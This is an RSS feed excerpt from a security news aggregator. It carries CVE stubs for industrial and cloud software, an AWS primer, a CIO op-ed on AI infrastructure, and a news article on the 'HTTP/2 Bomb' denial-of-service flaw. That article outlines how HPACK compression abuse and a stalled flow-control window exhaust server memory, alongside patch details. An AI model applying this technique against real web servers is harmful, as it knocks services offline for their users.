<link>https://tsecurity.de/de/3574960/sicherheitsluecken/cve-2015-5240-openstack-neutron-up-to-201423201511-ml2-plugin-race-condition-rhsa-20151909-nessus-id-318733/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574960/sicherheitsluecken/cve-2015-5240-openstack-neutron-up-to-201423201511-ml2-plugin-race-condition-rhsa-20151909-nessus-id-318733/</guid>
<pubDate>Fri, 05 Jun 2026 11:50:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/openstack:neutron">OpenStack Neutron up to 2014.2.3/2015.1.1</a>. Affected is an unknown function of the component <em>ML2 Plugin</em>. Such manipulation leads to race condition.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2015-5240">CVE-2015-5240</a>. The attack can be launched remotely. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[I Started Learning AWS and Realised I Didn’t Fully Understand the Internet]]></title>
<description><![CDATA[My journey into cloud computing and the concepts that changed how I view modern technology.IntroWhen I first learnt about the cloud, I believed the cloud was just a computer in a different location. But that misconception broke, just recently, when I started learning AWS.Later, I found it was not...]]></description>
<link>https://tsecurity.de/de/3574571/hacking/i-started-learning-aws-and-realised-i-didnt-fully-understand-the-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574571/hacking/i-started-learning-aws-and-realised-i-didnt-fully-understand-the-internet/</guid>
<pubDate>Fri, 05 Jun 2026 08:50:00 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gm4bVTPVCOhGF7xF5zFf_g.png"></figure><h4>My journey into cloud computing and the concepts that changed how I view modern technology.</h4><h3>Intro</h3><p>When I first learnt about the cloud, I believed <strong>the cloud</strong> was just a <strong>computer </strong>in a <strong>different location</strong>. But that <strong>misconception </strong>broke, just recently, when I started learning <strong>AWS</strong>.</p><p>Later, I found it was not only<strong> a single concept</strong> that I had <strong>misunderstood</strong>, but when I learnt more about <strong>AWS</strong>, it completely changed <strong>how I looked at the internet.</strong></p><p>Later in this write-up, I will fully explain the <strong>core concepts</strong> of the <strong>cloud </strong>and <strong>AWS</strong>, which I have learnt from <strong>the AWS Cloud Practitioner Essentials</strong>.</p><h3>The Cloud Computing</h3><p>The <strong>single-line definition</strong>, yet <strong>very powerful</strong>, which fully explains cloud computing core concepts.</p><blockquote>The Cloud Computing is an <em>on-demand delivery of the IT Resources over the internet with pay-as-you-go pricing.</em></blockquote><h4>Breaking down the definition</h4><ul><li><strong>on-demand: </strong>You can <strong>provision </strong>servers, databases, or software whenever<strong> you need</strong> them with a <strong>few clicks</strong>, <strong>without waiting </strong>to buy or set up physical equipment.</li><li><strong>IT Resources: </strong>An IT Resource is any <strong>digital </strong>or <strong>physical technology</strong> <strong>asset </strong>used to <strong>process</strong>, <strong>store</strong>, or <strong>manage data</strong>. Ex: CPUs, Hard drives, VMs, Firewalls, Databases, IT software, etc.</li><li><strong>over the internet: </strong>You can access the resources directly using the internet connection “<strong>remotely</strong>”.</li></ul><h3>Cloud Deployment Model</h3><p>A Cloud Deployment Model defines <strong>where your cloud infrastructure</strong> <strong>lives</strong>, who <strong>owns </strong>and <strong>manages </strong>it, and how it is <strong>accessed</strong>.</p><p>Understanding these models is the crucial first step for any business <strong>migrating </strong>to the <strong>cloud</strong>, as each offers <strong>distinct </strong>trade-offs in <strong>governance</strong>, <strong>cost</strong>, <strong>security</strong>, and <strong>management</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/562/1*yXWBC7lQ_6l8Yqet-0P2BQ.png"><figcaption>Public Cloud (Credit: geeksforgeeks)</figcaption></figure><h4>1. Public Cloud:</h4><p>The Pubic Cloud delivers <strong>services </strong>and <strong>infrastructure </strong>to the <strong>public </strong>or<strong> broad industry group.</strong> The infrastructure is entirely <strong>owned</strong>, <strong>managed</strong>, and <strong>maintained </strong>by a <em>third-party</em> cloud service provider, and resources are shared among multiple tenants.</p><p>E.g., <em>Google Cloud, AWS, Microsoft Azure</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/668/1*unJ8SLI1VqUWyhM4xCdX4A.png"><figcaption>Private Cloud (Credit: geeksforgeeks)</figcaption></figure><h4>2. Private Cloud</h4><p>The <em>Private Cloud</em> is a <strong>one-on-one environment</strong> for a <strong>single user </strong>(customer). There is <strong>no need to share</strong> your <strong>hardware </strong>with anyone else.</p><p>The distinction between <strong><em>public </em></strong>and <strong><em>private </em></strong>is in <strong>how you handle all of the hardware</strong>.</p><p>The private cloud gives greater flexibility and control over cloud resources.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/704/1*5HI30eUYY9h_5sTK_eyg1Q.png"><figcaption>Hybrid Cloud (Credit: geeksforgeeks)</figcaption></figure><h4>3. Hybrid Cloud</h4><p>It's a combination of <strong><em>Private </em></strong>and <strong><em>Public cloud</em></strong>.</p><p>With a hybrid solution, you may host the app in a <strong>safe environment</strong> while <strong>taking advantage of the public cloud’s cost savings</strong>.</p><p>Organisations can <strong>move data</strong> and <strong>applications </strong>between <strong>different clouds</strong> by combining two or more cloud <strong>deployment methods</strong>, depending on their <strong>needs</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*zBPvs8tpLqq0i3Ol.png"></figure><h3>What is AWS?</h3><p><strong>Amazon Web Services (AWS)</strong> is the world’s most comprehensive and <strong>broadly adopted cloud platform</strong>.</p><p>It was officially launched in <strong>March 2006</strong>. Major tech giants like <strong>Netflix </strong>migrated entirely to <strong>AWS</strong>, and by <strong>2015</strong>, the platform became highly profitable.</p><h3>Benefits of The AWS Cloud</h3><ul><li><strong>Stop guessing capacity</strong>: Allows you to <strong>dynamically scale</strong> AWS Cloud Resources <strong>up or down</strong> based on <strong>real-world demand</strong>.</li><li><strong>Increase Speed and Agility</strong>: Businesses can <strong>rapidly deploy</strong> applications and services, <strong>accelerating time</strong> to market and facilitating <strong>quicker responses </strong>to <strong>changing business needs</strong> and <strong>market conditions</strong>.</li><li><strong>Stop spending money to run and maintain data centers: </strong>The AWS Cloud eliminates the <strong>need for businesses to invest</strong> in <strong>physical data centers</strong>. This means that customers <strong>aren’t required to spend time </strong>and <strong>money </strong>on utilities and <strong>ongoing maintenance</strong>.</li><li><strong>Benefit from massive economies of scale: </strong>Buying a product in <strong>bulk </strong>can result in <strong>lower prices</strong> per <strong>unit</strong>. This means that AWS can be used by many organisations, from <strong>small startups</strong> to <strong>major corporations</strong>.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*c-pbJY5465yvd2U0vIK3sw.png"></figure><h3><strong>AWS Global Infrastructure</strong></h3><p>AWS Global Infrastructure consists of <strong>physical locations</strong> around the world that contain <strong>groups of data centers</strong>.</p><p>It is designed with <strong>high availability</strong> and <strong>fault tolerance</strong> in mind.</p><h4>Availability Zones (AZ)</h4><p>Availability Zones are configured as <strong>isolated resources</strong>, and they are each <strong>equipped </strong>with <strong>independent power</strong>, <strong>networking</strong>, and <strong>connectivity</strong>.</p><p>It’s recommended to <strong>distribute your resources</strong> across <strong>multiple AZs</strong>. That way, if one AZ encounters <strong>an outage</strong>, your business applications will <strong>continue to operate without interruption</strong>.</p><h3>AWS Shared Responsibility Model</h3><p>The AWS Shared Responsibility Model is a concept designed to help AWS and customers <strong>work together</strong> to <strong>create a secure</strong>, <strong>functional cloud environment</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/698/1*sSr-w_OfzrIXvbW7iN9VPQ.png"><figcaption>AWS Shared Responsibility Model (Credit: AWS)</figcaption></figure><h3>Conclusion</h3><p>AWS provided the<strong> IT Resources</strong> to the organisations with <strong>ease </strong>and <strong>a lot of benefits. </strong>It not only helps <strong>large organisations</strong> but also helps <strong>small start-ups</strong> by <strong>reducing maintenance efforts and costs.</strong></p><p>But we haven’t seen the <strong>AWS Services</strong> and <strong>support it provides</strong>.</p><p>Later in the <strong>upcoming write-up,</strong> I will bring the <strong>AWS write-up </strong>on <em>AWS services</em>, <em>features</em>, <em>functionalities</em>, and <em>management tools</em>.</p><p>So, <strong>make sure you follow</strong> and <strong>subscribe to the email</strong> <strong>✉ .</strong></p><p>Let me know <strong><em>your thoughts</em></strong> 💭 and <strong><em>what part of AWS benefits you like the most.</em></strong></p><p><strong><em>Clap and share</em></strong> this with <em>your friends </em>and <em>colleagues</em>. See you in the upcoming blog.</p><p>Till then, <strong><em>keep learning, keep growing</em></strong>.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=a5abfd709343" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-started-learning-aws-and-realised-i-didnt-fully-understand-the-internet-a5abfd709343">I Started Learning AWS and Realised I Didn’t Fully Understand the Internet</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HTTP/2’s speed abused to slow webserver performance in DoS attack]]></title>
<description><![CDATA[Security researchers are warning of an issue with the default HTTP/2 configuration used by major web servers which reportedly survived more than a decade of human review before showing up in Codex-assisted analysis.



A flaw in the handling of the HTTP/2 protocol made a denial-of-service (DoS) a...]]></description>
<link>https://tsecurity.de/de/3573388/it-security-nachrichten/http2s-speed-abused-to-slow-webserver-performance-in-dos-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573388/it-security-nachrichten/http2s-speed-abused-to-slow-webserver-performance-in-dos-attack/</guid>
<pubDate>Thu, 04 Jun 2026 18:50:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Security researchers are warning of an issue with the default HTTP/2 configuration used by major web servers which reportedly survived more than a decade of human review before showing up in Codex-assisted analysis.</p>



<p>A flaw in the handling of the HTTP/2 protocol made a denial-of-service (DoS) attack possible on web servers including nginx, Apache HTTP server, Microsoft IIS, Envoy, and Cloudflare’s Pingora, according to security consultancy Calif.</p>



<p><a href="https://www.infoworld.com/article/2245551/seven-no-bull-facts-about-the-new-http-2-protocol.html">HTTP/2</a> was introduced in 2015 to increase the speed of HTTP by allowing multiple simultaneous connections, and is gradually being superceded by <a href="https://www.infoworld.com/article/3497016/what-is-http-3-the-next-generation-web-protocol.html">HTTP/3</a>, which is built on the new QUIC encrypted transport protocol. The problem uncovered by Calif lies in how affected servers handle HTTP/2 header compression and request processing, allowing an attacker to trigger disproportionate memory consumption.</p>



<p>“The attack chained two techniques known to humans for a decade: a compression bomb and a Slowloris-style hold,” Calif CEO <a href="https://www.linkedin.com/in/thaidn/" target="_blank" rel="noreferrer noopener">Thai Duong</a> said in a blog post, calling the technique <a href="https://blog.calif.io/p/codex-discovered-a-hidden-http2-bomb" target="_blank" rel="noreferrer noopener">HTTP/2 Bomb</a>. A search of Shodan revealed <a href="https://www.shodan.io/search?query=ssl.alpn%3A%22h2%22+product%3Anginx%2CApache%2CIIS%2CEnvoy%2CPingora" target="_blank" rel="noreferrer noopener">880,000+ websites</a> supporting HTTP/2 and running one of these servers, although many of these websites use a Content Delivery Network (<a href="https://www.csoonline.com/article/4101395/suspicious-traffic-could-be-testing-cdn-evasion-says-expert.html">CDN</a>), which may add some complexity to the attack, he said.</p>



<h2 class="wp-block-heading"><a></a>Weaponizing a compression feature for DoS</h2>



<p>The issue, tracked as <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49975" target="_blank" rel="noreferrer noopener">CVE-2026-49975</a>, involves HPACK, the header compression mechanism built into HTTP/2. Calif found that attackers can abuse the protocol’s dynamic header table in a way that forces servers to repeatedly allocate memory far beyond what would normally be expected from the size of incoming requests.</p>



<p>A relatively small amount of attacker-controlled traffic can trigger excessive memory allocations on the target server, Duong said.</p>



<p>“The bomb targets HPACK, HTTP/2’s header compression scheme: One byte on the wire becomes one full header allocation on the server, repeated thousands of times per request,” he said. “The hold is a zero-byte flow-control window that keeps the server from ever freeing any of it.”</p>



<p>This isn’t the first time HTTP/2 was flagged for allowing DoS attacks. In 2019, <a href="https://blog.cloudflare.com/on-the-recent-http-2-dos-attacks" target="_blank" rel="noreferrer noopener">multiple</a> HTTP/2 denial-of-service vulnerabilities disclosed by Netflix affected numerous server implementations and prompted emergency patches across the ecosystem.</p>



<p>In October 2023, the protocol was <a href="https://www.csoonline.com/article/655106/built-in-weakness-in-http-2-protocol-exploited-for-massive-ddos-attacks.html">disclosed to be prone</a> to massive DDoS attacks owing to its stream multiplexing capability.</p>



<p><a></a>Duong recalled in the post how in 2012 he contributed to the discovery and patching of a flaw in HPACK, that back then was exploited by a different attack, <a href="https://docs.digicert.com/en/certcentral/certificate-tools/discovery-user-guide/tls-ssl-endpoint-vulnerabilities/crime.html">CRIME</a>. “I was too fixated on fighting CRIME and missed the Bomb,” he reflected.</p>



<p>Calif reported the flaw to all affected projects. nginx and Apache HTTP Server moved quickly to block the attack path, while Envoy patched on June 3. Microsoft IIS and Cloudflare’s Pingora had yet to release patches at the time of publication.</p>



<p>Admins will need to obtain the fixed versions of nginx (v1.29.8+) or Apache (mod_http2 v2.0.41), through the normal update channels used for these products. Envoy <a href="https://github.com/envoyproxy/envoy/security/advisories/GHSA-22m2-hvr2-xqc8" target="_blank" rel="noreferrer noopener">issued patches</a> for versions 1.35.11, 1.36.7, 1.37.3, and 1.38.1.</p>



<p>For organizations without a patch available to them, Calif recommended disabling HTTP/2 if possible, or “front the server with something that enforces a hard cap on header count per request.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phased Timelines: DSCI roadmap for India's PQC migration]]></title>
<description><![CDATA[Author: PQShield - Bewertung: 0x - Views:1 The episode discusses India’s ambitious roadmap for quantum migration. The guests explore the aggressive 2029 deadline for critical infrastructure and the broader strategy for building a quantum resilient society. This conversation provides a detailed lo...]]></description>
<link>https://tsecurity.de/de/3572344/videos/phased-timelines-dsci-roadmap-for-indias-pqc-migration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572344/videos/phased-timelines-dsci-roadmap-for-indias-pqc-migration/</guid>
<pubDate>Thu, 04 Jun 2026 13:17:39 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: PQShield - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/4MbwcovC82o?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The episode discusses India’s ambitious roadmap for quantum migration. The guests explore the aggressive 2029 deadline for critical infrastructure and the broader strategy for building a quantum resilient society. This conversation provides a detailed look at how one of the world’s largest digital economies is preparing for the quantum threat.<br />
<br />
YouTube Chapters:<br />
<br />
[00:00] Intro <br />
[02:17] The history of India’s quantum journey since 2015 <br />
[10:19] Security challenges of India’s digital public infrastructure <br />
[15:38] The 2024 roadmap and public consultation process <br />
[23:44] Defining milestones for critical information infrastructure <br />
[29:30] National guidelines versus sectoral enforcement <br />
[33:08] Balancing NIST standards with sovereign security needs <br />
[35:32] The critical role of cryptographic agility <br />
[41:24] Practical steps for organizations to start today <br />
[43:13] The evolution of the vendor supply chain <br />
[45:14] Where to find resources and follow DSCI’s work <br />
[46:46] Final thoughts and wrap up<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI cloud strategy isn’t about cost. It’s about gravity]]></title>
<description><![CDATA[I’ve spent the better part of the last eighteen months in conference rooms with CIOs working through their AI strategy. The conversations all start in the same place — model selection, vendor evaluation, agent frameworks — and they all eventually arrive at the same uncomfortable question.



“Whe...]]></description>
<link>https://tsecurity.de/de/3572283/it-security-nachrichten/your-ai-cloud-strategy-isnt-about-cost-its-about-gravity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3572283/it-security-nachrichten/your-ai-cloud-strategy-isnt-about-cost-its-about-gravity/</guid>
<pubDate>Thu, 04 Jun 2026 13:07:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I’ve spent the better part of the last eighteen months in conference rooms with CIOs working through their AI strategy. The conversations all start in the same place — model selection, vendor evaluation, agent frameworks — and they all eventually arrive at the same uncomfortable question.</p>



<p>“Where is this actually going to run?”</p>



<p>The question lands awkwardly because it sounds like it should have been settled years ago. Most enterprises picked their cloud provider somewhere between 2015 and 2020. They standardized on AWS, Azure or GCP, signed multi-year commits, and built their application portfolio accordingly. The cloud strategy was done. So why is it suddenly back on the table?</p>



<p>Because the workload changed underneath it. The cloud strategy that made sense for stateless web applications doesn’t make sense for AI agents and the CIOs figuring this out fastest are the ones rebuilding their architecture around a constraint most of their procurement teams don’t even know exists yet.</p>



<h2 class="wp-block-heading">The old cloud calculus is broken</h2>



<p>For roughly a decade, cloud strategy was about where applications run. You optimized for compute price, developer velocity and managed services. Data was something you moved to where the apps were. This worked because the data-to-compute ratio was small. A typical application request moved kilobytes of structured data between the app and its database.</p>



<p>The architectural pattern that emerged was elegant in its simplicity: applications in one region, data in another, users somewhere else entirely and the network in between papered over the seams. Latency budgets were measured in user-perceptible terms — a 200ms page load was acceptable, a 500ms one was a problem. Cross-region calls were a tax you paid for resilience or for putting compute close to the user.</p>



<p>That entire model assumed the application was the thing doing the work, and the data was the thing being acted upon.</p>



<p>AI agents inverted that assumption.</p>



<h2 class="wp-block-heading">AI inverted the ratio</h2>



<p>Agents don’t just consume data. They live in it.</p>



<p>Memory, context, retrieval, embeddings — the data isn’t an input to the workload. It largely <em>is</em> the workload. An agent reasoning about a customer’s situation is pulling in conversation history, organizational policies, product documentation and structured records on every turn. An agent writing code is pulling in the repository, the architectural decision records, the test suite and the relevant runtime telemetry. An agent doing financial analysis is pulling in market data, internal forecasts, regulatory filings and historical context — and then producing intermediate results that feed back into the next reasoning step.</p>



<p>The data isn’t a thing the workload references occasionally. It’s the substrate the workload is computing on.</p>



<p>And that substrate has gravity.</p>



<p>It has <strong>regulatory gravity</strong> — sovereignty mandates, residency requirements, sector-specific compliance regimes that say data of a particular type cannot leave a particular jurisdiction. The <a href="https://artificialintelligenceact.eu/" rel="nofollow">EU AI Act</a>, HIPAA, financial services regulations across a dozen countries — these aren’t preferences. They’re constraints that determine, before you’ve made any architectural decisions at all, where some of your data is allowed to be.</p>



<p>It has <strong>economic gravity</strong> — egress fees, GPU-hour pricing differentials, the brute economics of <a href="https://www.earezki.com/ai-news/2026-03-01-i-compared-data-egress-costs-across-44-cloud-providers-heres-the-breakdown/" rel="nofollow">moving terabyte-scale corpora across cloud boundaries</a>. Training data and embedding stores aren’t gigabytes anymore. Moving them isn’t a config change. It’s a project, sometimes a quarter-long one, with a real bill attached.</p>



<p>It has <strong>incumbency gravity</strong> — the data is where it is, and moving petabytes is not on this year’s roadmap. Most enterprises have data sprawled across systems that were never designed to be portable. The fact that your customer records live in a particular cloud isn’t because someone made a strategic decision in 2026. It’s because they made a strategic decision in 2017 and the data has been accumulating there ever since.</p>



<p>And it has <strong>latency gravity</strong> — and this is the one that’s quietly rewriting the architecture for everyone.</p>



<h2 class="wp-block-heading">Wall time is the forcing function</h2>



<p>Here’s the math that nobody puts in their slide decks.</p>



<p>A modest agentic loop (retrieve, reason, act, observe) easily does five to ten round trips per task. The agent retrieves relevant context. Reasons about it. Calls a tool. Observes the result. Reasons about that. Retrieves more context. Acts again. Each of those steps touches the data layer, the memory store, the model and back.</p>



<p>Now put 50 milliseconds of cross-region network latency on each hop. That’s 250 to 500 milliseconds of pure network tax on every single agent task, on top of the actual model inference and tool execution. Run that loop a hundred times an hour, across thousands of concurrent agent sessions, and you’re not looking at a minor degradation. You’re looking at the difference between an agent that feels alive and an agent that feels like dial-up.</p>



<p>This is why I keep telling CIOs the same thing in those conference rooms: your data, your memory store, your models and your agent runtime need to be in the same physical datacenter. Period.</p>



<p>Whether that physical datacenter is yours or one of the hyperscalers’ is the actual question worth debating. But they have to be co-located. If you’re spreading these across regions or providers to chase a procurement discount, you’re sabotaging your own AI strategy before it ships.</p>



<p>I want to head off two objections before the comments section gets to them.</p>



<p>“What about agents that legitimately need to span regions? Say, a global customer service agent that needs to retrieve from regional data stores?”</p>



<p>Those aren’t really one agent. They’re a federation of regional agents with a routing layer on top, and the wall-time math applies within each region. The federation is the architecture. Pretending it’s one agent stretched across geographies is how you end up with the dial-up problem.</p>



<p>“What about hyperscaler private connectivity? <a href="https://aws.amazon.com/directconnect/" rel="nofollow">Direct Connect</a>, <a href="https://learn.microsoft.com/en-us/azure/expressroute/expressroute-introduction" rel="nofollow">ExpressRoute</a>. That gets cross-region latency down to single-digit milliseconds?”</p>



<p>Single-digit milliseconds still compounds across an agentic loop more than it did for human-driven activity. Five hops at 5ms are 25ms of network tax per task, which adds up across millions of tasks.</p>



<p>And private connectivity doesn’t solve the other gravities. It doesn’t make data residency mandates go away. It doesn’t change egress economics for the data itself. It just makes a single dimension of the problem somewhat better.</p>



<p>The constraint is physics, not procurement. You can’t negotiate with the speed of light.</p>



<h2 class="wp-block-heading">That’s why the cloud market fragmented</h2>



<p>Once you accept that agents have to run physically next to their data, memory and models, the <a href="https://www.datacenterknowledge.com/cloud/earnings-roundup-neoclouds-shift-from-gpu-race-to-power-wars" rel="nofollow">recent fragmentation of the AI cloud market</a> starts to make sense.</p>



<p>Sovereign clouds aren’t winning on patriotism. They’re winning where regulatory gravity dominates and the data is already on a particular side of a particular border. Neoclouds aren’t winning on a vibe shift. They’re winning where economic gravity dominates and GPU-hour pricing makes the math work. Private clouds aren’t winning because on-prem is back in fashion. They’re winning where incumbency gravity dominates and the data is already in your datacenter and isn’t going anywhere. Hyperscalers are still winning where developer gravity and managed services dominate, and where the data is already in their object storage from a decade of cloud migration.</p>



<p>These aren’t competing on the old dimensions. They’re each winning in scenarios where a different gravity is the binding constraint.</p>



<p>The right question isn’t which cloud you should pick. It’s which gravity dominates for each workload, and therefore where the <em>whole stack</em> (data, memory, model, agent runtime) needs to be co-located. Some agents will run in three places. Some agents will need to move between them. That’s why deployment flexibility matters more than it ever did when we were just running stateless apps.</p>



<h2 class="wp-block-heading">What CIOs should actually do this quarter</h2>



<p>Stop picking a cloud. Start mapping your agent portfolio against the four gravities and let the architecture fall out of that.</p>



<p>For each AI workload you’re planning to put into production over the next twelve months, work through four questions:</p>



<ol class="wp-block-list">
<li><strong>Where does the data live, or where is it going to end up?</strong> Not where you wish it lived. Where it actually is, or where regulatory or business reality is forcing it to be. This is the answer that constrains everything else.</li>



<li><strong>Which gravity is dominant?</strong> If regulatory mandates are non-negotiable, that’s your binding constraint. If GPU economics are the issue, that’s your binding constraint. If you have ten petabytes of historical data sitting in a particular cloud and moving it is a multi-year project, that’s your binding constraint.</li>



<li><strong>What’s the wall-time budget for the agent loop?</strong> If it’s a batch workload, you have flexibility. If it’s a real-time customer-facing agent, you need everything in the same datacenter and you need to design for it from day one.</li>



<li><strong>What’s the portability requirement?</strong> As model providers compete and pricing shifts, can you move the agent runtime without moving the data? Can you move the data without rewriting the agent? Lock-in used to be denominated in egress fees. Now it’s denominated in token pricing, embedding model compatibility and agent framework portability.</li>
</ol>



<p>The CIOs who get this wrong won’t lose because they chose the wrong cloud. They’ll lose because they chose <em>a</em> cloud. Singular, monolithic, picked once in 2019 when the right answer was a portfolio architected around the gravities of each workload.</p>



<p>Cloud strategy stopped being a procurement decision the day agents became the workload. It became a physics problem. And the physics doesn’t care which vendor you signed with.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-6492 | Allen-Bradley MicroLogix 1100/1400 HTTP Request memory corruption]]></title>
<description><![CDATA[A vulnerability was found in Allen-Bradley MicroLogix 1100/1400. It has been declared as critical. Affected is an unknown function of the component HTTP Request Handler. The manipulation results in memory corruption.

This vulnerability is cataloged as CVE-2015-6492. The attack may be launched re...]]></description>
<link>https://tsecurity.de/de/3570304/sicherheitsluecken/cve-2015-6492-allen-bradley-micrologix-11001400-http-request-memory-corruption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570304/sicherheitsluecken/cve-2015-6492-allen-bradley-micrologix-11001400-http-request-memory-corruption/</guid>
<pubDate>Wed, 03 Jun 2026 18:38:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/allen-bradley:micrologix">Allen-Bradley MicroLogix 1100/1400</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>HTTP Request Handler</em>. The manipulation results in memory corruption.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2015-6492">CVE-2015-6492</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-6490 | Allen-Bradley MicroLogix 1100/1400 memory corruption]]></title>
<description><![CDATA[A vulnerability was found in Allen-Bradley MicroLogix 1100/1400 and classified as critical. This affects an unknown function. Executing a manipulation can lead to memory corruption.

This vulnerability is tracked as CVE-2015-6490. The attack can be launched remotely. No exploit exists.

It is sug...]]></description>
<link>https://tsecurity.de/de/3570303/sicherheitsluecken/cve-2015-6490-allen-bradley-micrologix-11001400-memory-corruption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570303/sicherheitsluecken/cve-2015-6490-allen-bradley-micrologix-11001400-memory-corruption/</guid>
<pubDate>Wed, 03 Jun 2026 18:38:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/allen-bradley:micrologix">Allen-Bradley MicroLogix 1100/1400</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown function. Executing a manipulation can lead to memory corruption.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2015-6490">CVE-2015-6490</a>. The attack can be launched remotely. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Until Dawn 2 announced, but it's by a new developer — either way, I'm still excited for more slasher horror]]></title>
<description><![CDATA[A sequel to Until Dawn has been announced, but the successor to the 2015 horror game isn't being developed by Supermassive Games.]]></description>
<link>https://tsecurity.de/de/3569824/it-nachrichten/until-dawn-2-announced-but-its-by-a-new-developer-either-way-im-still-excited-for-more-slasher-horror/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569824/it-nachrichten/until-dawn-2-announced-but-its-by-a-new-developer-either-way-im-still-excited-for-more-slasher-horror/</guid>
<pubDate>Wed, 03 Jun 2026 15:46:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A sequel to Until Dawn has been announced, but the successor to the 2015 horror game isn't being developed by Supermassive Games.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-0987 | Omron CX-One CX-Programmer/CJ2M PLC/CJ2H PLC PLC Unlock information disclosure (SBV-53997 / BID-76938)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Omron CX-One CX-Programmer, CJ2M PLC and CJ2H PLC. The impacted element is an unknown function of the component PLC Unlock Handler. Such manipulation leads to information disclosure.

This vulnerability is documented as CVE-2015-0...]]></description>
<link>https://tsecurity.de/de/3567765/sicherheitsluecken/cve-2015-0987-omron-cx-one-cx-programmercj2m-plccj2h-plc-plc-unlock-information-disclosure-sbv-53997-bid-76938/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567765/sicherheitsluecken/cve-2015-0987-omron-cx-one-cx-programmercj2m-plccj2h-plc-plc-unlock-information-disclosure-sbv-53997-bid-76938/</guid>
<pubDate>Wed, 03 Jun 2026 00:23:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/omron:cx-one_cx-programmer">Omron CX-One CX-Programmer, CJ2M PLC and CJ2H PLC</a>. The impacted element is an unknown function of the component <em>PLC Unlock Handler</em>. Such manipulation leads to information disclosure.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2015-0987">CVE-2015-0987</a>. The attack can be executed remotely. There is not any exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-2177 | Siemens SIMATIC S7-300 Cpu input validation (ssa-987029 / EDB-44802)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in Siemens SIMATIC S7-300 Cpu. Impacted is an unknown function. This manipulation causes improper input validation.

This vulnerability is registered as CVE-2015-2177. Remote exploitation of the attack is possible. Furthermore, an exploit is...]]></description>
